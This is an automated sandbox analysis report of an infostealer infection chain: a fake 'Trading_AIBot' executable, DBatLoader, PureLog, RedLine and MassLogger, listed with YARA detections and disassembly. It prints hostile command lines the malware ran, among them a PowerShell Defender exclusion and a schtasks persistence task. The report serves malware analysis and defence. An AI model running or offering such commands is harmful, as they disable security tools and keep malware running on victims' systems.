                                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.22967000001.0000000002436000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:20:47:11
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                      Imagebase:0xb20000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:20:47:11
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6aaab0000
                                                                                                                                      File size:875'008 bytes
                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:20:47:12
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:175'800 bytes
                                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000003.22965228435.000000002761C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000001.22963397742.00000000017D0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 3%, ReversingLabs
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:5
                                                                                                                                      Start time:20:47:12
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                      Imagebase:0x7b0000
                                                                                                                                      File size:70'656 bytes
                                                                                                                                      MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 79%, ReversingLabs
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:6
                                                                                                                                      Start time:20:47:12
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Microsofts.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                                                                                                                                      Imagebase:0x800000
                                                                                                                                      File size:98'816 bytes
                                                                                                                                      MD5 hash:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.24180228176.0000000002DA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000000.22971337611.0000000000802000.00000002.00000001.01000000.0000000B.sdmp, Author: unknown
                                                                                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                                      • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 91%, ReversingLabs
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:false

                                                                                                                                      General

                                                                                                                                      Target ID:7
                                                                                                                                      Start time:20:47:14
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                                                                      Imagebase:0x80000
                                                                                                                                      File size:433'152 bytes
                                                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:8
                                                                                                                                      Start time:20:47:14
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 20:52 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                      Imagebase:0x3c0000
                                                                                                                                      File size:187'904 bytes
                                                                                                                                      MD5 hash:478BEAEC1C3A9417272BC8964ADD1CEE
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:moderate
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:9
                                                                                                                                      Start time:20:47:14
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6aaab0000
                                                                                                                                      File size:875'008 bytes
                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:10
                                                                                                                                      Start time:20:47:14
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6aaab0000
                                                                                                                                      File size:875'008 bytes
                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:11
                                                                                                                                      Start time:20:47:15
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                      Imagebase:0x7ff6728c0000
                                                                                                                                      File size:496'640 bytes
                                                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:12
                                                                                                                                      Start time:20:47:21
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:2'145'792 bytes
                                                                                                                                      MD5 hash:F7D9FFE252E26320F26A76FC3F239C50
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      • Detection: 27%, ReversingLabs
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:13
                                                                                                                                      Start time:20:47:21
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                      Imagebase:0xb20000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:14
                                                                                                                                      Start time:20:47:21
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6aaab0000
                                                                                                                                      File size:875'008 bytes
                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:15
                                                                                                                                      Start time:20:47:21
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:175'800 bytes
                                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.23112425454.000000002DA40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000003.23062543754.000000002B733000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000002.23100866629.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000F.00000001.23060773301.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.23114375641.000000002EA95000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.23111776153.000000002D593000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000002.23115572603.00000000304E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:16
                                                                                                                                      Start time:20:47:29
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\Public\Libraries\Oupzhkpr.PIF
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\Public\Libraries\Oupzhkpr.PIF"
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:2'145'792 bytes
                                                                                                                                      MD5 hash:F7D9FFE252E26320F26A76FC3F239C50
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:17
                                                                                                                                      Start time:20:47:29
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
                                                                                                                                      Imagebase:0xb20000
                                                                                                                                      File size:236'544 bytes
                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:18
                                                                                                                                      Start time:20:47:29
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      Imagebase:0x7ff6aaab0000
                                                                                                                                      File size:875'008 bytes
                                                                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:19
                                                                                                                                      Start time:20:47:29
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      File size:175'800 bytes
                                                                                                                                      MD5 hash:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.23188607246.0000000030743000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000013.00000002.23176421665.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.23190771291.0000000032F70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.23191645092.00000000335E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000003.23143070311.000000002E873000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000013.00000002.23190455309.0000000031995000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000013.00000001.23140173632.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                      Has exited:true

                                                                                                                                      General

                                                                                                                                      Target ID:20
                                                                                                                                      Start time:20:47:49
                                                                                                                                      Start date:02/01/2025
                                                                                                                                      Path:C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                                                                                                                                      Imagebase:0xb00000
                                                                                                                                      File size:665'670'656 bytes
                                                                                                                                      MD5 hash:785BCB4933871B92E40A89544BFA615E
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Antivirus matches:
                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                      Has exited:false

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:15.2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                        Signature Coverage:10.3%
                                                                                                                                        Total number of Nodes:290
                                                                                                                                        Total number of Limit Nodes:16
                                                                                                                                        execution_graph 25225 2dd1c6c 25226 2dd1c7c 25225->25226 25227 2dd1d04 25225->25227 25230 2dd1c89 25226->25230 25231 2dd1cc0 25226->25231 25228 2dd1d0d 25227->25228 25229 2dd1f58 25227->25229 25232 2dd1d25 25228->25232 25233 2dd1e24 25228->25233 25236 2dd1fec 25229->25236 25240 2dd1fac 25229->25240 25241 2dd1f68 25229->25241 25235 2dd1c94 25230->25235 25273 2dd1724 25230->25273 25234 2dd1724 10 API calls 25231->25234 25237 2dd1d2c 25232->25237 25243 2dd1d48 25232->25243 25247 2dd1dfc 25232->25247 25251 2dd1e7c 25233->25251 25252 2dd1e55 Sleep 25233->25252 25261 2dd1e95 25233->25261 25238 2dd1cd7 25234->25238 25260 2dd1a8c 8 API calls 25238->25260 25264 2dd1cfd 25238->25264 25244 2dd1fb2 25240->25244 25248 2dd1724 10 API calls 25240->25248 25246 2dd1724 10 API calls 25241->25246 25242 2dd1724 10 API calls 25254 2dd1f2c 25242->25254 25253 2dd1d79 Sleep 25243->25253 25257 2dd1d9c 25243->25257 25245 2dd1ca1 25263 2dd1cb9 25245->25263 25297 2dd1a8c 25245->25297 25265 2dd1f82 25246->25265 25249 2dd1724 10 API calls 25247->25249 25262 2dd1fc1 25248->25262 25267 2dd1e05 25249->25267 25250 2dd1fa7 25251->25242 25251->25261 25252->25251 25255 2dd1e6f Sleep 25252->25255 25256 2dd1d91 Sleep 25253->25256 25253->25257 25254->25261 25266 2dd1a8c 8 API calls 25254->25266 25255->25233 25256->25243 25259 2dd1e1d 25260->25264 25262->25250 25269 2dd1a8c 8 API calls 25262->25269 25265->25250 25268 2dd1a8c 8 API calls 25265->25268 25270 2dd1f50 25266->25270 25267->25259 25271 2dd1a8c 8 API calls 25267->25271 25268->25250 25272 2dd1fe4 25269->25272 25271->25259 25274 2dd1968 25273->25274 25282 2dd173c 25273->25282 25275 2dd1a80 25274->25275 25276 2dd1938 25274->25276 25279 2dd1a89 25275->25279 25280 2dd1684 VirtualAlloc 25275->25280 25281 2dd1947 Sleep 25276->25281 25286 2dd1986 25276->25286 25277 2dd174e 25278 2dd175d 25277->25278 25288 2dd182c 25277->25288 25291 2dd180a Sleep 25277->25291 25278->25245 25279->25245 25283 2dd16bf 25280->25283 25284 2dd16af 25280->25284 25285 2dd195d Sleep 25281->25285 25281->25286 25282->25277 25287 2dd17cb Sleep 25282->25287 25283->25245 25314 2dd1644 25284->25314 25285->25276 25292 2dd15cc VirtualAlloc 25286->25292 25294 2dd19a4 25286->25294 25287->25277 25290 2dd17e4 Sleep 25287->25290 25296 2dd1838 25288->25296 25320 2dd15cc 25288->25320 25290->25282 25291->25288 25293 2dd1820 Sleep 25291->25293 25292->25294 25293->25277 25294->25245 25296->25245 25298 2dd1b6c 25297->25298 25299 2dd1aa1 25297->25299 25300 2dd1aa7 25298->25300 25301 2dd16e8 25298->25301 25299->25300 25304 2dd1b13 Sleep 25299->25304 25302 2dd1ab0 25300->25302 25306 2dd1b4b Sleep 25300->25306 25312 2dd1b81 25300->25312 25303 2dd1c66 25301->25303 25307 2dd1644 2 API calls 25301->25307 25302->25263 25303->25263 25304->25300 25305 2dd1b2d Sleep 25304->25305 25305->25299 25308 2dd1b61 Sleep 25306->25308 25306->25312 25309 2dd16f5 VirtualFree 25307->25309 25308->25300 25310 2dd170d 25309->25310 25310->25263 25311 2dd1c00 VirtualFree 25311->25263 25312->25311 25313 2dd1ba4 25312->25313 25313->25263 25315 2dd1681 25314->25315 25316 2dd164d 25314->25316 25315->25283 25316->25315 25317 2dd164f Sleep 25316->25317 25318 2dd1664 25317->25318 25318->25315 25319 2dd1668 Sleep 25318->25319 25319->25316 25324 2dd1560 25320->25324 25322 2dd15d4 VirtualAlloc 25323 2dd15eb 25322->25323 25323->25296 25325 2dd1500 25324->25325 25325->25322 25326 2dfc2fc 25336 2dd6518 25326->25336 25330 2dfc32a 25341 2dfbb48 timeSetEvent 25330->25341 25332 2dfc334 25333 2dfc342 GetMessageA 25332->25333 25334 2dfc336 TranslateMessage DispatchMessageA 25333->25334 25335 2dfc352 25333->25335 25334->25333 25337 2dd6523 25336->25337 25342 2dd4168 25337->25342 25340 2dd427c SysAllocStringLen SysFreeString SysReAllocStringLen 25340->25330 25341->25332 25343 2dd41ae 25342->25343 25344 2dd43b8 25343->25344 25345 2dd4227 25343->25345 25347 2dd43e9 25344->25347 25351 2dd43fa 25344->25351 25356 2dd4100 25345->25356 25361 2dd432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 25347->25361 25350 2dd43f3 25350->25351 25352 2dd443f FreeLibrary 25351->25352 25353 2dd4463 25351->25353 25352->25351 25354 2dd446c 25353->25354 25355 2dd4472 ExitProcess 25353->25355 25354->25355 25357 2dd4143 25356->25357 25358 2dd4110 25356->25358 25357->25340 25358->25357 25359 2dd15cc VirtualAlloc 25358->25359 25362 2dd5814 25358->25362 25359->25358 25361->25350 25363 2dd5840 25362->25363 25364 2dd5824 GetModuleFileNameA 25362->25364 25363->25358 25366 2dd5a78 GetModuleFileNameA RegOpenKeyExA 25364->25366 25367 2dd5afb 25366->25367 25368 2dd5abb RegOpenKeyExA 25366->25368 25384 2dd58b4 12 API calls 25367->25384 25368->25367 25369 2dd5ad9 RegOpenKeyExA 25368->25369 25369->25367 25371 2dd5b84 lstrcpynA GetThreadLocale GetLocaleInfoA 25369->25371 25375 2dd5c9e 25371->25375 25376 2dd5bbb 25371->25376 25372 2dd5b20 RegQueryValueExA 25373 2dd5b40 RegQueryValueExA 25372->25373 25374 2dd5b5e RegCloseKey 25372->25374 25373->25374 25374->25363 25375->25363 25376->25375 25378 2dd5bcb lstrlenA 25376->25378 25379 2dd5be3 25378->25379 25379->25375 25380 2dd5c08 lstrcpynA LoadLibraryExA 25379->25380 25381 2dd5c30 25379->25381 25380->25381 25381->25375 25382 2dd5c3a lstrcpynA LoadLibraryExA 25381->25382 25382->25375 25383 2dd5c6c lstrcpynA LoadLibraryExA 25382->25383 25383->25375 25384->25372 25385 2df67bc 26202 2dd480c 25385->26202 26203 2dd481d 26202->26203 26204 2dd485a 26203->26204 26205 2dd4843 26203->26205 26220 2dd4570 26204->26220 26211 2dd4b78 26205->26211 26208 2dd4850 26209 2dd488b 26208->26209 26225 2dd4500 26208->26225 26212 2dd4b85 26211->26212 26219 2dd4bb5 26211->26219 26214 2dd4bae 26212->26214 26217 2dd4b91 26212->26217 26215 2dd4570 11 API calls 26214->26215 26215->26219 26216 2dd4b9f 26216->26208 26231 2dd2c44 11 API calls 26217->26231 26232 2dd44ac 26219->26232 26221 2dd4598 26220->26221 26222 2dd4574 26220->26222 26221->26208 26245 2dd2c10 26222->26245 26224 2dd4581 26224->26208 26226 2dd4504 26225->26226 26229 2dd4514 26225->26229 26228 2dd4570 11 API calls 26226->26228 26226->26229 26227 2dd4542 26227->26209 26228->26229 26229->26227 26230 2dd2c2c 11 API calls 26229->26230 26230->26227 26231->26216 26233 2dd44cd 26232->26233 26234 2dd44b2 26232->26234 26233->26216 26234->26233 26236 2dd2c2c 26234->26236 26237 2dd2c3a 26236->26237 26238 2dd2c30 26236->26238 26237->26233 26238->26237 26239 2dd2d19 26238->26239 26243 2dd64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 26238->26243 26244 2dd2ce8 7 API calls 26239->26244 26242 2dd2d3a 26242->26233 26243->26239 26244->26242 26246 2dd2c27 26245->26246 26248 2dd2c14 26245->26248 26246->26224 26247 2dd2c1e 26247->26224 26248->26247 26249 2dd2d19 26248->26249 26253 2dd64cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 26248->26253 26254 2dd2ce8 7 API calls 26249->26254 26252 2dd2d3a 26252->26224 26253->26249 26254->26252 26255 2dfbb3c 26258 2deec6c 26255->26258 26259 2deec74 26258->26259 26259->26259 29241 2de8704 LoadLibraryW 26259->29241 26261 2deec96 29246 2dd2ee0 QueryPerformanceCounter 26261->29246 26263 2deec9b 26264 2deeca5 InetIsOffline 26263->26264 26265 2deecaf 26264->26265 26266 2deecc0 26264->26266 26268 2dd4500 11 API calls 26265->26268 26267 2dd4500 11 API calls 26266->26267 26269 2deecbe 26267->26269 26268->26269 26270 2dd480c 11 API calls 26269->26270 26271 2deeced 26270->26271 26272 2deecf5 26271->26272 29249 2dd4798 26272->29249 26274 2deed18 26275 2deed20 26274->26275 26276 2deed2a 26275->26276 29264 2de881c 26276->29264 26279 2dd480c 11 API calls 26280 2deed51 26279->26280 26281 2deed59 26280->26281 26282 2dd4798 11 API calls 26281->26282 26283 2deed7c 26282->26283 26284 2deed84 26283->26284 29277 2dd46a4 26284->29277 29279 2de80c0 29241->29279 29243 2de873d 29290 2de7cf8 29243->29290 29247 2dd2eed 29246->29247 29248 2dd2ef8 GetTickCount 29246->29248 29247->26263 29248->26263 29250 2dd47fd 29249->29250 29251 2dd479c 29249->29251 29252 2dd47a4 29251->29252 29253 2dd4500 29251->29253 29252->29250 29254 2dd47b3 29252->29254 29256 2dd4500 11 API calls 29252->29256 29257 2dd4570 11 API calls 29253->29257 29259 2dd4514 29253->29259 29258 2dd4570 11 API calls 29254->29258 29255 2dd4542 29255->26274 29256->29254 29257->29259 29261 2dd47cd 29258->29261 29259->29255 29260 2dd2c2c 11 API calls 29259->29260 29260->29255 29262 2dd4500 11 API calls 29261->29262 29263 2dd47f9 29262->29263 29263->26274 29265 2de8830 29264->29265 29266 2de884f LoadLibraryA 29265->29266 29326 2dd494c 29266->29326 29269 2dd494c 29270 2de8872 GetProcAddress 29269->29270 29271 2de8899 29270->29271 29272 2de7cf8 18 API calls 29271->29272 29273 2de88dd FreeLibrary 29272->29273 29274 2de88f5 29273->29274 29275 2dd44d0 11 API calls 29274->29275 29276 2de8902 29275->29276 29276->26279 29278 2dd46aa 29277->29278 29278->29278 29280 2dd4500 11 API calls 29279->29280 29281 2de80e5 29280->29281 29304 2de790c 29281->29304 29284 2dd4798 11 API calls 29285 2de80ff 29284->29285 29286 2de8107 GetModuleHandleW GetProcAddress GetProcAddress 29285->29286 29287 2de813a 29286->29287 29310 2dd44d0 29287->29310 29291 2dd4500 11 API calls 29290->29291 29292 2de7d1d 29291->29292 29293 2de790c 